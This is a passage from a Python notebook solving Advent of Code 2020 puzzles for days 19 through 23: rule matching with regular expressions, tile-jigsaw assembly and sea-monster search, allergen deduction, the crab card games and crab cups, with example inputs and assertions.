bbbbbbbaaaabbbbaaabbabaaa
bbbababbbbaaaaaaaabbababaaababaabab
ababaaaaaabaaab
ababaaaaabbbaba
baabbaaaabbaaaababbaababb
abbbbabbbbaaaababbbbbbaaaababb
aaaaabbaabaaaaababaa
aaaabbaaaabbaaa
aaaabbaabbaaaaaaabbbabbbaaabbaabaaa
babaaabbbaaabaababbaabababaaab
aabbbbbaabbbaaaaaabbbbbababaaaaabbaaabba
""".strip()
log.setLevel(logging.INFO)
rules, samples = parse_day19(tests)
# cap expansion depth at the longest sample length (regex can't usefully be longer)
max_samples_len = max(mapl(len, samples))
log.debug(f"max_samples_len={max_samples_len}")
pd = solve_day19(rules, part=2, max_depth=max_samples_len)
log.debug(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
log.info(f"parsed-rules, len(rule0)={len(rule0)}")
smatching = 0
for sample in samples:
    if re.match(rule0, sample):
        smatching +=1
log.info(f"matching-samples-#={smatching}")
assert( 12 == smatching )
# In[ ]:
# Day 19 part b on the real input.
log.setLevel(logging.INFO)
rules, samples = parse_day19(ins)
max_samples_len = max(mapl(len, samples))
log.debug(f"max_samples_len={max_samples_len}")
pd = solve_day19(rules, part=2, max_depth=max_samples_len)
log.debug(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
log.info(f"parsed-rules, len(rule0)={len(rule0)}")
smatching = 0
for sample in samples:
    if re.match(rule0, sample):
        smatching +=1
log.info(f"matching-samples-#={smatching}")
# ### Day 20: Jurassic Jigsaw
# In[ ]:
# Day 20 example input: nine 10x10 tiles with ids.
tests = """
Tile 2311:
..##.#..#.
##..#.....
#...##..#.
####.#...#
##.##.###.
##...#.###
.#.#.#..##
..#....#..
###...#.#.
..###..###
Tile 1951:
#.##...##.
#.####...#
.....#..##
#...######
.##.#....#
.###.#####
###.##.##.
.###....#.
..#.#..#.#
#...##.#..
Tile 1171:
####...##.
#..##.#..#
##.#..#.#.
.###.####.
..###.####
.##....##.
.#...####.
#.##.####.
####..#...
.....##...
Tile 1427:
###.##.#..
.#..#.##..
.#.##.#..#
#.#.#.##.#
....#...##
...##..##.
...#.#####
.#.####.#.
..#..###.#
..##.#..#.
Tile 1489:
##.#.#....
..##...#..
.##..##...
..#...#...
#####...#.
#..#.#.#.#
...#.#.#..
##.#...##.
..##.##.##
###.##.#..
Tile 2473:
#....####.
#..#.##...
#.##..#...
######.#.#
.#...#.#.#
.#########
.###.#..#.
########.#
##...##.#.
..###.#.#.
Tile 2971:
..#.#....#
#...###...
#.#.###...
##.##..#..
.#####..##
.#..####.#
#..#.#..#.
..####.###
..#.#.###.
...#.#.#.#
Tile 2729:
...#.#.#.#
####.#....
..#.#.....
....#..#.#
.##..##.#.
.#.####...
####.#.#..
##.####...
##..#.##..
#.##...##.
Tile 3079:
#.#.#####.
.#..######
..#.......
######....
####.#..#.
.#...#.##.
#.#####.##
..#.###...
..#.......
..#.###...
""".strip()
# In[ ]:
def get_dimens(num_tiles):
    """Log every possible grid factorization gridx*gridy == num_tiles
    with both dimensions > 1. Purely informational (returns nothing)."""
    for gridx in range(1, num_tiles+1):
        for gridy in range(1, num_tiles+1):
            if gridx * gridy == num_tiles:
                if gridx > 1 and gridy > 1:
                    log.info(f"[get_dimens] {gridx}x{gridy} dimen possible.")
def get_borders(tile):
    """Collect a tile's border strings as a set: top, bottom, left and right
    edges, each also in reversed orientation (8 entries for a generic tile)."""
    rows = tile.split("\n")
    top = rows[0]
    bottom = rows[-1]
    left = ''.join(row[0] for row in rows)
    right = ''.join(row[-1] for row in rows)
    borders = set()
    for edge in (top, bottom, left, right):
        borders.add(edge)
        borders.add(edge[::-1]) # reversed
    return borders
def find_corner_tiles(tiles):
    """Return the set of tile ids that sit in the corners of the assembled image.

    A tile's border set is intersected with every other tile's; corner tiles
    share borders with fewer than 3 other orientations (only 2 neighbors).
    NOTE(review): near-duplicate of find_border_tiles below (threshold differs).
    """
    tile_keys = tiles.keys()
    borders = {}  # tile id -> set of 8 border strings
    bsects = {}   # tile id -> list of intersection sizes with every other tile
    for key in tile_keys:
        borders[key] = get_borders(tiles[key])
        bsects[key] = []
    for combi in itertools.permutations(tile_keys, 2):
        key1, key2 = combi
        b1 = borders[key1]
        b2 = borders[key2]
        bsects[key1].append( len( b1 & b2 ) )
    corner_tiles = set()
    for key in tile_keys:
        #log.info(f"key: {key} {bsects[key]}")
        bct = len( filterl(lambda it: it > 0, bsects[key]) )
        if bct < 3:
            #log.info(f"border-tile: {key}")
            corner_tiles.add(key)
        #elif bct == 4:
        #    log.info(f"middle-tile: {key}")
    return corner_tiles
def find_border_tiles(tiles):
    """Return the set of tile ids on the (non-corner) edge of the image:
    tiles sharing borders with exactly 3 other tiles.
    NOTE(review): near-duplicate of find_corner_tiles above (threshold differs).
    """
    tile_keys = tiles.keys()
    borders = {}  # tile id -> set of 8 border strings
    bsects = {}   # tile id -> list of intersection sizes with every other tile
    for key in tile_keys:
        borders[key] = get_borders(tiles[key])
        bsects[key] = []
    for combi in itertools.permutations(tile_keys, 2):
        key1, key2 = combi
        b1 = borders[key1]
        b2 = borders[key2]
        bsects[key1].append( len( b1 & b2 ) )
    border_tiles = set()
    for key in tile_keys:
        bct = len( filterl(lambda it: it > 0, bsects[key]) )
        if bct == 3:
            border_tiles.add(key)
    return border_tiles
def parse_tiles(s):
    """Parse puzzle input into {tile_id: tile_body}; body excludes the header line."""
    tiles = {}
    for block in s.split("\n\n"):
        header, _, body = block.partition("\n")
        tile_id = int(header.replace('Tile ', '').replace(':', ''))
        tiles[tile_id] = body.strip()
    return tiles
# In[ ]:
# Day 20 part a: run on the example tile set first, then on the real input.
tiles = parse_tiles(tests)
num_tiles = len(tiles.keys())
tile_keys = tiles.keys()
log.info(f"tests num-tiles={num_tiles}")
get_dimens(num_tiles)
find_corner_tiles(tiles)
# In[ ]:
ins = aoc.read_file_to_str('in/day20.in').strip()
tiles = parse_tiles(ins)
num_tiles = len(tiles.keys())
log.info(f"input num-tiles={num_tiles}")
res = find_corner_tiles(tiles)
log.info(f"ins corner-tiles={res}")
# part-a answer: product of the four corner tile ids
res = np.prod(list(res))
log.info(f"Day 20 a solution: border-tiles-product={res}")
# In[ ]:
print("Day 20 b")
# In[ ]:
from math import sqrt
def flip_vert_tile(s):
    """Flip a tile vertically (row order reversed), return str repr."""
    return "\n".join(s.split("\n")[::-1])
def flip_horiz_tile(s):
    """Flip a tile horizontally (every row reversed), return str repr."""
    return "\n".join(line[::-1] for line in s.split("\n"))
def rotate_tile(s):
    """Left-rotate (quarter turn) a tile representation, return str repr.

    Columns of the input become rows of the output, last column first.
    Improvements over the original: uses zip() so non-square tiles are
    handled correctly (the old column loop indexed columns by the ROW
    count and silently dropped columns), and drops the per-call trace
    string formatting that ran in the innermost backtracking hot loop.
    """
    rows = s.split("\n")
    return "\n".join("".join(col) for col in reversed(list(zip(*rows))))
def get_tile_transforms(s):
    """Provide all transforms of a tile as a set, including identity.

    For each of: the tile itself, its vertical flip and its horizontal flip,
    take the base plus three successive rotations (12 candidates, deduplicated).
    """
    variants = set()
    for base in (s, flip_vert_tile(s), flip_horiz_tile(s)):
        current = base
        variants.add(current)
        for _ in range(3):
            current = rotate_tile(current)
            variants.add(current)
    return variants
def fits_horiz(lefts, rights):
    """True if the right edge of `lefts` equals the left edge of `rights`."""
    right_edge = str.join('', [row[-1] for row in lefts.split("\n")])
    left_edge = str.join('', [row[0] for row in rights.split("\n")])
    return right_edge == left_edge
def fits_vert(tops, bottoms):
    """True if the bottom edge of `tops` equals the top edge of `bottoms`."""
    return tops.split("\n")[-1] == bottoms.split("\n")[0]
def get_next_coord(coord, image_width):
    """Advance (x, y) in row-major order over an image_width-wide grid.

    Wraps x to 0 and increments y at the end of a row.  The per-call trace
    logging was removed: this runs once per cell of the recursive search and
    formatted its message even when tracing was disabled.
    """
    x, y = coord
    if x == image_width - 1:
        return (0, y + 1)
    return (x + 1, y)
def is_corner(coord, image_width):
    """True if coord is one of the four corner cells of the image grid.

    Per-call trace logging removed (hot predicate; message was formatted
    unconditionally).
    """
    x, y = coord
    edge = (0, image_width - 1)
    return x in edge and y in edge
def is_border(coord, image_width):
    """True if coord lies on the grid edge but is not a corner.

    A cell is a border cell when exactly one of its coordinates is on the
    edge; both on the edge would make it a corner.  Fixes the original's
    misleading unconditional '{coord} is border' trace that was emitted
    BEFORE the predicate was evaluated, and drops per-call logging from
    this hot predicate.
    """
    on_edge_x = coord[0] in (0, image_width - 1)
    on_edge_y = coord[1] in (0, image_width - 1)
    return on_edge_x != on_edge_y
def create_image(tiles, tilekeys_left, img, imgidx, coord, corner_tiles, border_tiles, image_width):
    """Recursively fill the image grid with fitting tile transforms.

    Walks the grid in row-major order (coord), trying every remaining tile id
    in every orientation against the already-placed left/upper neighbours.
    Returns (found, img, imgidx) where imgidx is the parallel grid of tile ids.

    NOTE(review): on a match this returns the recursion's result directly, so
    it does NOT backtrack over alternative tiles/transforms when a deeper
    placement fails — evidently sufficient for this puzzle input; confirm
    before reuse.  corner_tiles/border_tiles are currently unused (the
    candidate-pruning code is commented out below).
    """
    x, y = coord
    log.debug(f"[create_image] tks-left={len(tilekeys_left)}, @{coord}")
    # walked past the last row => the whole grid has been filled successfully
    if x >= image_width or y >= image_width:
        log.debug(f"FOUND\n{np.array(imgidx)}")
        return True, img, imgidx
    if y > 0 and x > 0:
        # interior cell: candidate must fit the left AND the upper neighbour
        #if is_corner(coord, image_width): # @ corner
        #    tkl2 = tilekeys_left & corner_tiles
        #elif is_border(coord, image_width): # @border
        #    tkl2 = tilekeys_left & border_tiles
        #else:
        #    tkl2 = tilekeys_left
        #for tk in tkl2:
        for tk in tilekeys_left:
            for tvari in get_tile_transforms( tiles[tk] ):
                if fits_horiz(img[y][x-1], tvari) and fits_vert(img[y-1][x], tvari):
                    tkl_new = tilekeys_left.copy(); tkl_new.remove(tk)
                    img_new = copy.deepcopy(img); img_new[y][x] = tvari
                    log.debug(f"found h+v match for tilekey={tk} @{coord}")
                    imgidx_new = copy.deepcopy(imgidx); imgidx_new[y][x] = tk
                    return create_image(tiles, tkl_new, img_new, imgidx_new, get_next_coord(coord, image_width), corner_tiles, border_tiles, image_width)
    elif y > 0:
        # first column (x == 0): only the upper neighbour constrains the tile
        #if is_corner(coord, image_width): # @ corner
        #    tkl2 = tilekeys_left & corner_tiles
        #else: # @border
        #    tkl2 = tilekeys_left & border_tiles
        #for tk in tkl2:
        for tk in tilekeys_left:
            for tvari in get_tile_transforms( tiles[tk] ):
                if fits_vert(img[y-1][x], tvari):
                    tkl_new = tilekeys_left.copy(); tkl_new.remove(tk)
                    img_new = copy.deepcopy(img); img_new[y][x] = tvari
                    imgidx_new = copy.deepcopy(imgidx); imgidx_new[y][x] = tk
                    log.debug(f"found h+v match for tilekey={tk} @{coord}")
                    return create_image(tiles, tkl_new, img_new, imgidx_new, get_next_coord(coord, image_width), corner_tiles, border_tiles, image_width)
    elif x > 0:
        # first row (y == 0): only the left neighbour constrains the tile
        #if is_corner(coord, image_width): # @ corner
        #    tkl2 = tilekeys_left & corner_tiles
        #else: # @border
        #    tkl2 = tilekeys_left & border_tiles
        #for tk in tkl2:
        for tk in tilekeys_left:
            for tvari in get_tile_transforms( tiles[tk] ):
                if fits_horiz(img[y][x-1], tvari):
                    tkl_new = tilekeys_left.copy(); tkl_new.remove(tk)
                    img_new = copy.deepcopy(img); img_new[y][x] = tvari
                    imgidx_new = copy.deepcopy(imgidx); imgidx_new[y][x] = tk
                    log.debug(f"found h+v match for tilekey={tk} @{coord}")
                    return create_image(tiles, tkl_new, img_new, imgidx_new, get_next_coord(coord, image_width), corner_tiles, border_tiles, image_width)
    # no remaining tile fits at this cell -> this branch of the search fails
    log.trace("[create_image] fall-out")
    return False, img, imgidx
def assemble_image(tiles):
    """Assemble the full image: place a corner tile at (0,0) and recurse.

    Returns (found, img, imgidx) — the grid of transformed tile strings and
    the parallel grid of tile ids.  Sanity-checks first that exactly 4 corner
    candidates and 4*(w-2) border candidates exist.
    """
    tiles_keys = tiles.keys()
    num_tiles = len(tiles)
    # the image is assumed square: width in tiles = sqrt(tile count)
    image_width = int(sqrt(num_tiles))
    corner_tiles = find_corner_tiles(tiles)
    log.info(f"[assemble_image] corner-tiles-#={len(corner_tiles)}")
    assert( 4 == len(corner_tiles) )
    border_tiles = find_border_tiles(tiles)
    log.info(f"[assemble_image] border-tiles-#={len(border_tiles)}; image_width={image_width}")
    assert( 4*(image_width-2) == len(border_tiles) )
    # fix one corner tile at (0,0) and try each of its orientations in turn
    start_tile = list(corner_tiles)[0]
    log.info(f"[assemble_image] starting; tiles_set={set(tiles_keys)}")
    tilekeys_left = set(tiles_keys) - set([start_tile])
    for vari in get_tile_transforms( tiles[start_tile] ):
        img = [[None for x in range(image_width)] for y in range(image_width)]
        imgidx = [[None for x in range(image_width)] for y in range(image_width)]
        img[0][0] = vari
        imgidx[0][0] = start_tile
        log.debug(f"first corner tile img=\n{vari}")
        img_found, img_final, imgidx_final = create_image(tiles, tilekeys_left, img, imgidx, get_next_coord((0,0), image_width), corner_tiles, border_tiles, image_width)
        if img_found:
            log.info(f"IMG found, idxs=\n{imgidx_final}")
            break
    assert( img_found )
    return img_found, img_final, imgidx_final
def get_image_repr(img):
    """Join a square grid of tile strings into one big image string."""
    img_len = len(img)
    tile_len = len(img[0][0].split("\n"))
    log.debug(f"[get_image_repr] num-tiles={img_len}^2={img_len**2} cells-per-tile={tile_len**2}")
    out_rows = []
    for tile_row in img:
        # split each tile of this grid-row into its text lines, then zip the
        # lines together so matching rows of neighbouring tiles are joined
        split_tiles = [tile.split("\n") for tile in tile_row]
        for line_parts in zip(*split_tiles):
            out_rows.append(str.join('', line_parts))
    return str.join("\n", out_rows)
def show_image(img):
    """Log the assembled image: its dimensions plus the full string repr."""
    img_len = len(img)
    tile_len = len(img[0][0].split("\n"))
    log.info(f"[show_image] num-tiles={img_len}^2={img_len**2} cells-per-tile={tile_len**2}")
    log.info("\n"+get_image_repr(img))
def cut_tile_borders(tile):
    """Return the tile with its outermost rows and columns removed."""
    rows = tile.split("\n")
    tile_len = len(rows)
    trimmed = [row[1:-1] for row in rows[1:-1]]
    # square-tile sanity checks, as in the original
    for row in trimmed:
        assert(len(row) == tile_len-2)
    assert(len(trimmed) == tile_len-2)
    return str.join("\n", trimmed)
def cut_image_borders(img):
    """Strip the border cells off every tile in the image grid, in place."""
    grid_len = len(img)
    for row in range(grid_len):
        for col in range(grid_len):
            img[row][col] = cut_tile_borders(img[row][col])
    return img
# In[ ]:
sea_monster = """
#
# ## ## ###
# # # # # #
"""
def tiles_to_sea_npar(sea_los):
    """Convert original tiles representation to a 'sea' numpy-array of 0s and 1s."""
    tiles = parse_tiles(sea_los)
    img_found, img, imgidx = assemble_image(tiles)
    #show_image(test_img)
    img_cut = cut_image_borders(img)
    #show_image(test_img_cut)
    img_cut = get_image_repr(img_cut) # from x*x matrix to 1 str
    # '.' -> "0 ", '#' -> "1 ": every cell becomes a space-separated digit
    image_los = img_cut.replace(".", "0 ").replace("#", "1 ").split("\n")
    image_ar = np.array([[int(c) for c in seamst_line.strip().split(" ")] for seamst_line in image_los])
    return image_ar
# Thanks github user JesperDramsch:
def variations_of(npar):
    """Return identity and all rotation and flip-horiz flip-vert variations of np-array."""
    out = []
    for quarter_turns in range(4):
        rotated = np.rot90(npar, quarter_turns)
        # each rotation plus its two axis flips
        out.extend([rotated, np.flip(rotated, 0), np.flip(rotated, 1)])
    return out
# Inspired
# Thanks github user JesperDramsch, via reddit aoc 2020 day 20 solutions/discussion:
# https://github.com/JesperDramsch/advent-of-code-1
def eliminate_monsters(sea, seamst):
    """Given 'sea' and 'seamonster' input numpy-arrays,
    eliminate all variations of seamonster (rots, flips) from the sea,
    return sea without monsters (np-array).

    NOTE(review): pops orientations until the FIRST one that matches at
    least once, then stops — assumes monsters appear in exactly one
    orientation (true for this puzzle).  Mutates `sea` in place; overlapping
    monsters would drive shared cells negative — confirm non-overlap holds.
    """
    seamst_cct = seamst.sum()
    seamst_varias = variations_of(seamst)
    monsters_num = 0
    while monsters_num == 0:
        monster = seamst_varias.pop()
        mst_y, mst_x = monster.shape
        # slide the monster window over every position of the sea
        for y, x in np.ndindex(sea.shape):
            sub_arr = sea[y : y + mst_y, x : x + mst_x].copy()
            if not sub_arr.shape == monster.shape:
                continue
            sub_arr *= monster # <= sea & monster
            if np.sum(sub_arr) == seamst_cct:
                monsters_num += 1
                sea[y : y + mst_y, x : x + mst_x] -= monster # => sea - monster
    return sea
# strip only surrounding newlines; inner spacing of the monster pattern matters
sea_monster = sea_monster.strip("\n")
#print(f">{sea_monster}<")
# Thanks github user JesperDramsch:
sea_monster_los = sea_monster.replace(" ", "0 ").replace("#", "1 ").split("\n")
#log.info(f"\n{sea_monster_los}")
seamst = np.array([[int(c) for c in seamst_line.strip().split(" ")] for seamst_line in sea_monster_los])
seamst_cct = seamst.sum()
log.info(f"Seamonster cell-count={seamst_cct}")
log.info(f"\n{seamst}")
sea_ar = tiles_to_sea_npar(tests)
log.info(f"sea-nparray, shape={sea_ar.shape}::\n{sea_ar}")
res = eliminate_monsters(sea_ar, seamst).sum()
# NOTE(review): log labels below say "Day 21" but this is day 20 part b
log.info(f"Day 21 b tests: rough-sea-count={res}")
assert( 273 == res )
# In[ ]:
sea_ar = tiles_to_sea_npar(ins)
log.info(f"sea-nparray, shape={sea_ar.shape}::\n{sea_ar}")
res = eliminate_monsters(sea_ar, seamst).sum()
log.info(f"Day 21 b final solution: rough-sea-count={res}")
# ### Day 21: Allergen Assessment
# In[ ]:
# example recipes: ingredient words followed by "(contains <allergens>)"
tests = """
mxmxvkd kfcds sqjhc nhms (contains dairy, fish)
trh fvjkl sbzzf mxmxvkd (contains dairy)
sqjhc fvjkl (contains soy)
sqjhc mxmxvkd sbzzf (contains fish)
""".strip().split("\n")
# In[ ]:
def solve_day21(los, part=1):
    """Solve AoC 2020 day 21 (Allergen Assessment).

    part 1: return the count of occurrences (across recipes) of ingredients
            that cannot contain any allergen.
    part 2: return the canonical dangerous-ingredient list — ingredients
            sorted by their allergen name, comma-joined.

    Fixes/cleanups vs. the original: removed a dead self-assignment
    (`ingred_allergic = ingred_allergic`) and replaced the non-standard
    mapl/filterl helpers with plain comprehensions.
    """
    ingreds_all = set()
    log.info(f"[solve21a] num-lines={len(los)}")
    allerg_assoc = {}
    recips = []
    for line in los:
        ingreds, allergs = line.split(' (contains ')
        ingreds = set(ingreds.strip().split(' '))
        allergs = allergs.strip().replace(')','').split(', ')
        log.debug(f" ingreds={ingreds}; allergs={allergs}")
        ingreds_all |= ingreds
        recips.append({'ingreds':ingreds, 'allergs':allergs})
        for allerg in allergs:
            # an allergen's ingredient must appear in EVERY recipe listing it:
            # intersect candidate sets
            if allerg not in allerg_assoc:
                allerg_assoc[allerg] = set(ingreds)
            else:
                allerg_assoc[allerg] &= set(ingreds)
    # constraint propagation: repeatedly pin allergens whose candidate set has
    # shrunk to one ingredient and remove that ingredient from the others
    for _ in range(len(allerg_assoc)): # loop and weed max n times
        found_allergs = [a for a in allerg_assoc if len(allerg_assoc[a]) == 1]
        found_ingreds = [next(iter(allerg_assoc[a])) for a in found_allergs]
        for allerg in allerg_assoc:
            if allerg in found_allergs:
                continue
            allerg_assoc[allerg] -= set(found_ingreds)
        if max(len(v) for v in allerg_assoc.values()) == 1:
            break
    allerg_assoc = {k: next(iter(v)) for k, v in allerg_assoc.items()} # get rid of wrapping set per values
    log.info(f"allerg_assoc={allerg_assoc}")
    ingreds_pure = ingreds_all - set(allerg_assoc.values())
    log.info(f"ingreds-pure={ingreds_pure}")
    ct = sum(1 for ingred_pure in ingreds_pure
             for recip in recips if ingred_pure in recip['ingreds'])
    log.info(f"day 21 part 1: count of pure ingredients occurences={ct}")
    if part == 1:
        return ct
    vals_str = str.join(',', [allerg_assoc[k] for k in sorted(allerg_assoc.keys())])
    log.info(f"vals_str=>{vals_str}<")
    return vals_str
# In[ ]:
#log.setLevel(aoc.LOGLEVEL_TRACE)
log.setLevel(logging.INFO)
res = solve_day21(tests, part=1)
assert( 5 == res )
# In[ ]:
ins = aoc.read_file_to_list('./in/day21.in')
res = solve_day21(ins, part=1)
# bug fix: this line used the root logger (logging.info) instead of the
# module logger `log` used everywhere else, so the solution message could
# be lost or formatted differently depending on root-logger configuration
log.info(f"Day 21 a solution: {res}")
# In[ ]:
print("Day 21 b")
#log.setLevel(aoc.LOGLEVEL_TRACE)
#log.setLevel(logging.INFO)
res = solve_day21(tests, part=2)
assert( "mxmxvkd,sqjhc,fvjkl" == res )
# In[ ]:
res = solve_day21(ins, part=2)
log.info(f"Day 21 b solution:\n>{res}<")
# ### Day 22: Crab Combat
# In[ ]:
def parse_day22(s):
    """Parse 'Player N:' deck blocks into {player_id: [cards, top..bottom]}."""
    players = {}
    for block in s.split("\n\n"):
        lines = block.split("\n")
        # first line of each block is the 'Player N:' header
        player_id = int(lines[0].replace('Player ', '').replace(':',''))
        players[player_id] = [int(card) for card in lines[1:]]
    log.debug(f"[parse_day22] {players}")
    return players
def play_crabcardgame(players):
    """Play non-recursive Combat (day 22 part 1) until one deck is empty.

    Mutates and returns the players dict, adding bookkeeping keys
    't' (rounds played) and 'winner' (winning player id).
    NOTE(review): winner_idx would be unbound if a deck started empty, and
    the failsafe caps the game at 1000 rounds — assumed fine for this input.
    """
    t = 0
    player_keys = list(players.keys())
    while(
        min( mapl(lambda it: len(players[it]), player_keys) ) > 0
    ):
        # both players draw their top card; the higher card wins the round
        draw = mapl(lambda it: players[it].pop(0), player_keys)
        winner_idx = draw.index(max(draw))
        #players[player_keys[winner_idx]] += sorted(draw, reverse=True)
        loser_idx = (0 if winner_idx == 1 else 1)
        players[player_keys[winner_idx]] += [draw[winner_idx], draw[loser_idx]] # winner's card first
        t += 1
        log.debug(f"[play_ccg] t={t} draw={draw} {players}")
        if t > 1_000:
            raise Exception("failsafe")
    players['t'] = t
    players['winner'] = player_keys[winner_idx]
    return players
def score_crabcardgame(players):
    """Score the winning deck: bottom card * 1, next-up * 2, and so on."""
    cardstack = players[players['winner']]
    log.debug(f"[score_crabcardgame] cardstack={cardstack}")
    return sum((pos + 1) * card for pos, card in enumerate(reversed(cardstack)))
# In[ ]:
tests = """
Player 1:
9
2
6
3
1
Player 2:
5
8
4
7
10
""".strip()
# In[ ]:
# day 22 part 1: the example game's documented winning score is 306
players = parse_day22(tests)
players = play_crabcardgame(players)
res = score_crabcardgame(players)
assert( 306 == res)
# In[ ]:
ins = aoc.read_file_to_str('in/day22.in').strip()
players = parse_day22(ins)
players = play_crabcardgame(players)
res = score_crabcardgame(players)
log.info(f"Day 22 part 1 solution: winning score={res}")
# In[ ]:
print("Day 22 b")
def hashrep_of(player):
    """Stable sha1-hex digest of a player's hand, used for seen-state detection."""
    return hashlib.sha1(str(player).encode()).hexdigest()
def play_recursivecombat(players):
    """Play day-22 part-2 Recursive Combat; annotate winner/win-cond/t.

    The game ends when (a) the same hands reappear (player 1 wins the
    sub-game) or (b) one player runs out of cards.  When both players hold
    at least as many cards as the value they just drew, the round winner is
    decided by a recursive sub-game on copied, truncated decks.
    NOTE(review): the seen-state check requires BOTH hand-hashes to have
    been seen before (possibly from different earlier rounds), not the
    exact pair together — a deliberate reading per the note below; confirm.
    """
    t = 0
    player_keys = list(players.keys())
    player_seen_handhashes = set()
    plcardnums = [len(players[1]), len(players[2])]
    log.debug(f"[play_recursivecombat] plcard#={plcardnums} t={t} {players}")
    for t in range(1, 100_000):
        log.debug(f"t={t} init={players}")
        # NOTE: The hands-already-seen condition had to be read VERY CAREFULLY !!!
        player1_hashrep = hashrep_of(players[1])
        player2_hashrep = hashrep_of(players[2])
        if player1_hashrep in player_seen_handhashes and player2_hashrep in player_seen_handhashes:
            ### NOTE THE **AND** in above condition !!!
            log.debug(f" current hands already seen")
            hand_seen = True
        else:
            player_seen_handhashes.add(player1_hashrep)
            player_seen_handhashes.add(player2_hashrep)
            hand_seen = False
        if hand_seen:
            # repeated state: player 1 wins this (sub-)game immediately
            players['t'] = t
            players['winner'] = player_keys[0]
            players['win-cond'] = 'hand_already_seen'
            log.debug(f"win-cond plcard#={plcardnums} already-played players={players}")
            return players
        draw = mapl(lambda it: players[it].pop(0), player_keys)
        log.debug(f" t={t} draw={draw} keeping {players}")
        if draw[0] <= len(players[1]) and draw[1] <= len(players[2]):
            # both players have enough cards left
            log.debug(f" recursing")
            recursed_players = copy.deepcopy(players)
            # the quantity of cards copied is equal to the number on the card they drew to trigger the sub-game
            if draw[0] < len(players[1]):
                recursed_players[1] = recursed_players[1][:draw[0]] # cut the stack to size for recursion
            if draw[1] < len(players[2]):
                recursed_players[2] = recursed_players[2][:draw[1]] # cut the stack to size for recursion
            recursed_players = play_recursivecombat(recursed_players)
            winner = recursed_players['winner']
        else:
            # ordinary round: higher drawn card wins
            winner = draw.index(max(draw)) + 1
        winner_idx = winner - 1
        loser_idx = (0 if winner_idx == 1 else 1)
        players[winner] += [draw[winner_idx], draw[loser_idx]] # winner's card first
        if min( mapl(lambda it: len(players[it]), player_keys) ) <= 0:
            players['t'] = t
            players['winner'] = winner
            players['win-cond'] = '1player_out_of_cards'
            log.debug(f"win-cond plcard#={plcardnums} 1-player-run-outof-cards players={players}")
            return players
    raise Exception("failsafe")
# In[ ]:
# recursive combat on the example decks: documented winning score is 291
players = play_recursivecombat(parse_day22(tests))
res = score_crabcardgame(players)
assert( 291 == res )
tests_loop = """
Player 1:
43
19
Player 2:
2
29
14
""".strip()
# this deck arrangement would loop forever without the seen-hands rule
res = play_recursivecombat(parse_day22(tests_loop))
assert( res['win-cond'] == 'hand_already_seen' )
# In[ ]:
#log.setLevel(logging.INFO)
players = play_recursivecombat(parse_day22(ins))
log.info(f"recursive-combat result for ins: {players}")
res = score_crabcardgame(players)
log.info(f"Day 22 part 2 solution: recursive-combat winner-score={res}")
# ### Day 23: Crab Cups
# In[ ]:
def play_crabcups_round(l):
    """Play one crab-cups move on list `l`; return the new list.

    The returned list is rotated so the NEW current cup is at index 0
    (l[0] is always the current cup in this representation).
    """
    #orig_lst = l.copy()
    list_len = len(l)
    current = l[0]
    taken = [l.pop(1), l.pop(1), l.pop(1)] # take 3
    # destination: current-1, skipping taken cups, wrapping to the max label
    next_val = current - 1
    while(True):
        if next_val in l:
            next_idx = l.index(next_val)
            break
        else:
            next_val -= 1
            if next_val <= 0:
                next_val = max(l)
    log.debug(f"[play_crabcups_round] head={current}, taken={taken}, dest={next_val}")
    # rebuild the circle: destination cup, the three taken cups, then the
    # remaining cups in circular order after the destination
    new_list = [next_val]
    new_list = new_list + taken
    appending = False
    for val in itertools.cycle(l):
        if not appending:
            if val == next_val:
                appending = True
        else:
            new_list.append(val)
        if len(new_list) >= list_len:
            break
    log.debug(f" new_list={new_list}")
    # rotate so the cup clockwise of `current` becomes the new head
    tgt_idx = (new_list.index(current)+1) % list_len
    new_list2 = new_list[tgt_idx:] + new_list[:tgt_idx]
    log.debug(f" new_list2={new_list2}")
    return new_list2
def play_crabcups_game(l, rounds=1):
    """Play `rounds` crab-cups moves on a copy of `l`; return the final list."""
    log.info(f"[play_crabcups_game] started: l={l}, rounds={rounds}")
    cups = l.copy()
    for rnd in range(1, rounds+1):
        cups = play_crabcups_round(cups)
        log.debug(f" round={rnd} l={cups}")
    return cups
def score_crabcups_game(l):
    """Concatenate the cup labels clockwise after cup 1 into a single int.

    Bug fix: when cup 1 is the last element (tgt_idx wraps to 0) the
    original used a tuple index `l[tgt_idx, len(l)-1]`, which raises
    TypeError; it now slices correctly.  Also replaces the non-standard
    mapl helper with a comprehension.
    """
    tgt_idx = (l.index(1)+1) % len(l)
    if tgt_idx == 0:
        # cup 1 is last: everything before it, already in clockwise order
        outlst = l[:len(l)-1]
    else:
        outlst = l[tgt_idx:] + l[:tgt_idx-1]
    return int( str.join('', [str(c) for c in outlst]) )
# In[ ]:
# day 23 part 1: example cup circle from the puzzle text
tests = "389125467"
test_lst = mapl(int, list(tests))
res = play_crabcups_game(test_lst, rounds=10)
log.info(f"test result={res}")
score = score_crabcups_game(res)
log.info(f"test result 10rds score={score}")
assert( 92658374 == score )
res = play_crabcups_game(test_lst, rounds=100)
score = score_crabcups_game(res)
log.info(f"test result 100rds score={score}")
assert( 67384529 == score)
# In[ ]:
ins = aoc.read_file_to_str('in/day23.in').strip()
ins_lst = mapl(int, list(ins))
res = play_crabcups_game(ins_lst, rounds=100)
log.info(f"Day 23 part 1 result={res}")
score = score_crabcups_game(res)
log.info(f"Day 23 part 1 solution: result 100rds score={score}")
# In[ ]:
print("Day 23 b")
def assemble_crabcups2_list(l, num_cups = 1_000_000):
"""Get a cups-list according to part 2 requirements (1mio cups)."""
out_lst = l.copy()
max_val = max(l)
num_new_cups = num_cups - len(out_lst)
out_lst += list(range(max_val+1, num_cups+1))
assert( num_cups == len(out_lst) )
return out_lst
def play_crabcups_round_opt(l, rounds=1):
    """Optimize play of crabcups for n rounds, using cycling LinkedList instead of list.

    lkl maps each cup label to the label of the next cup clockwise, so every
    move is O(1) dict surgery instead of O(n) list rebuilding.  Returns the
    final circle unrolled into a plain list starting at the final current cup.
    """
    start_tm = int(time.time())
    list_len = len(l)
    # successor map: lkl[label] == label of the cup clockwise of it
    lkl = {}
    #firstval = l[0]
    #lastval = l[-1]
    curval = l[0]
    for idx, val in enumerate(l):
        next_idx = idx+1
        if next_idx == list_len:
            next_idx = 0
        lkl[val] = l[next_idx]
    for rd in range(rounds):
        # The crab picks up the three cups that are immediately clockwise of the current cup.
        # They are removed from the circle;
        # cup spacing is adjusted as necessary to maintain the circle.
        n1 = lkl[curval]
        n2 = lkl[n1]
        n3 = lkl[n2]
